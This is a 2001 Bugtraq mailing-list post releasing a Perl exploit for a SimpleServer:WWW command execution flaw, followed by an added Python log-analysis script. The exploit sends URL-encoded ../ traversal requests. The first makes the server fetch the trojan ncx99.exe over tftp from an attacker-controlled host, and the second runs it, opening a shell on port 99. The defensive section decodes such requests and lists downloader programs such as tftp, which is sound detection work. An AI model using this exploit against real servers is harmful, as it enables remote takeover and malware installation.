SimpleServer:WWW Command Execution Vulnerability Exploit Code Released
Date: Fri, 27 Jul 2001 10:42:05 +0000
From: "Thran ." <thran60@hotmail.com>
To: bugtraq@securityfocus.com
Subject: SimpleServer:WWW Command Execution Vulnerability Exploit Code Released
I coded an exploit for the SimpleServer Command Execution Vulnerability
found earlier. It uploads a trojan and executes it.
Regards,
thran,
www.cdlni.com
John
So we row on, boats against the current. --F. Scott Fitzgerald
Attachment: ssexploit.pl
#!/usr/bin/perl
# SimpleServer:WWW Command Execution Vulnerability
# CODED BY THRAN
# CDLNI 2001
# www.cdlni.com
# You may distribute this code freely
# I am in no way responsible for this code, it's for testing use only
# This script uploads ncx99.exe to the target server and executes it
# simply telnet to the target computer on port 99 after executing the trojan
# You need a tftp server listening on a remote computer
# ncx99.exe needs to be in the base dir of the tftp server
# <<<<<DO NOT FORGET TO ENTER A TFTP SERVER INSIDE THIS SCRIPT! :) >>>>>>
# (yes, including the () part :) )
# Greetz go out to Zerostealth, Creeping Death, Hellb0und, Shell (Warezd00d :) ),
# Kim Lloyd, and all my other buds
# btw, don't bug me about my sloppy coding, and don't even ask me why I had to
# create 2 socket handlers :/
# bye, have fun
use strict;
use warnings;
use IO::Socket;

# Replace the placeholder below with the IP of your tftp server (see the note above).
my $tftp_server = "(ENTER THE IP OF A TFTP SERVER HERE)";

print "Enter server IP:";
chomp(my $server = <STDIN>);
print "Enter remote port:";
chomp(my $port = <STDIN>);
print "Uploading file... this may take a minute\n\n";

my $remote = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server,
                                   PeerPort => $port, Reuse => 1)
    or die "Can't connect to \"$server\"\n";
$remote->autoflush(1);

# Here we write the actual HTTP request to the server; the entire URL had to be
# URL-encoded. Decoded, the path reads:
#   /cgi-bin/../../../../../../../WINNT/system32/tftp -i <tftp server> GET ncx99.exe c:\\winnt\\system32\\blab.exe
my $url = "GET /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"
        . "%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Ftftp%20-i%20$tftp_server"
        . "%20GET%20ncx99.exe%20c%3a%5c%5cwinnt%5c%5csystem32%5c%5cblab%2eexe HTTP/1.0\r\n\r\n";
print $url;
print $remote $url;
# receive everything the server sends and print it to the screen
while (<$remote>) { print }
close $remote;
print "\n\n\n";

print "Executing the trojan... If the screen seems to hang, the trojan should work\n";
my $remote2 = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server,
                                    PeerPort => $port, Reuse => 1)
    or die "Can't connect to \"$server\"\n";
$remote2->autoflush(1);
# Simply executing the trojan; of course the entire URL is still URL-encoded :)
# Decoded, the path reads: /cgi-bin/../../../../../../../WINNT/system32/blab
print $remote2 "GET /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"
             . "%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fblab HTTP/1.0\r\n\r\n";
# receive everything the server sends and print it to the screen
while (<$remote2>) { print }
close $remote2;
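The attached script hides both stages behind percent-encoding: a run of %2E%2E%2F (../) walks out of /cgi-bin/ into WINNT/system32, first to run tftp.exe as a downloader and then to run the dropped binary. The detection check below, an added example that is not part of the original post or of SimpleServer:WWW, decodes request lines the way a log reviewer would (repeating the decode so double-encoded traversal is also unwrapped), normalises the path, and flags any request that leaves the /cgi-bin/ root. The three sample request lines are constructed for this example; 192.0.2.10 is a documentation address standing in for the tftp server the script expects you to fill in, and the LOLBIN_DOWNLOADERS set is an assumption, not anything the post defines.

```python
"""Decode and flag encoded path-traversal requests of the kind the posted
SimpleServer:WWW exploit sends.  Added example, not code from the original
post; sample requests are constructed and 192.0.2.10 is a placeholder."""
import posixpath
import re
from urllib.parse import unquote

# Constructed samples: the first two mirror the exploit's two stages (fetch
# ncx99.exe via tftp, then run the dropped blab.exe); the third is a harmless
# CGI request for contrast.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"
    "%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Ftftp%20-i%20192.0.2.10"
    "%20GET%20ncx99.exe%20c%3a%5c%5cwinnt%5c%5csystem32%5c%5cblab%2eexe HTTP/1.0",
    "GET /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F"
    "%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fblab HTTP/1.0",
    "GET /cgi-bin/search.cgi?q=hello HTTP/1.0",
]

# Built-in Windows programs commonly abused to pull a payload onto the box.
# Assumed list for this example; extend it for your environment.
LOLBIN_DOWNLOADERS = {"tftp", "ftp", "cmd"}


def decode_request_path(request_line):
    """Return the fully percent-decoded path of an HTTP request line.

    Decoding repeats until the string stops changing, so %252E (a
    double-encoded '.') is unwrapped as well as %2E.
    """
    parts = request_line.split()
    if len(parts) < 2:
        raise ValueError("malformed request line: %r" % request_line)
    path = parts[1]
    previous = None
    while previous != path:
        previous, path = path, unquote(path)
    return path


def _inside(normalised, docroot):
    """True if a normalised path is the docroot or lies beneath it."""
    root = docroot.rstrip("/").lower()
    lowered = normalised.lower()
    return lowered == root or lowered.startswith(root + "/")


def analyse_request(request_line, docroot="/cgi-bin/"):
    """Decode, normalise and classify one request line.

    Backslashes count as separators because the target is Windows, so they are
    folded to '/' before posixpath.normpath collapses the '../' runs.  The
    program name is the basename of the first space-delimited token of the
    normalised path, minus any .exe suffix.
    """
    decoded = decode_request_path(request_line)
    normalised = posixpath.normpath(decoded.replace("\\", "/"))
    command = normalised.split(" ", 1)[0]
    program = re.sub(r"\.exe$", "", posixpath.basename(command).lower())
    return {
        "decoded": decoded,
        "normalised": normalised,
        "escapes_docroot": not _inside(normalised, docroot),
        "program": program,
        "downloader": program in LOLBIN_DOWNLOADERS,
    }


def flagged_requests(request_lines, docroot="/cgi-bin/"):
    """Indices of request lines whose normalised path escapes the docroot."""
    return [i for i, line in enumerate(request_lines)
            if analyse_request(line, docroot)["escapes_docroot"]]


if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_REQUESTS):
        info = analyse_request(line)
        verdict = "TRAVERSAL" if info["escapes_docroot"] else "ok"
        if info["downloader"]:
            verdict += " + downloader"
        print("[%d] %-16s %s" % (i, verdict, info["normalised"]))
```

Run against real logs by feeding the request-line column into flagged_requests; the normalised field shows the operator exactly what the request resolved to on disk, which is what makes the tftp download-and-execute pair stand out from ordinary CGI traffic.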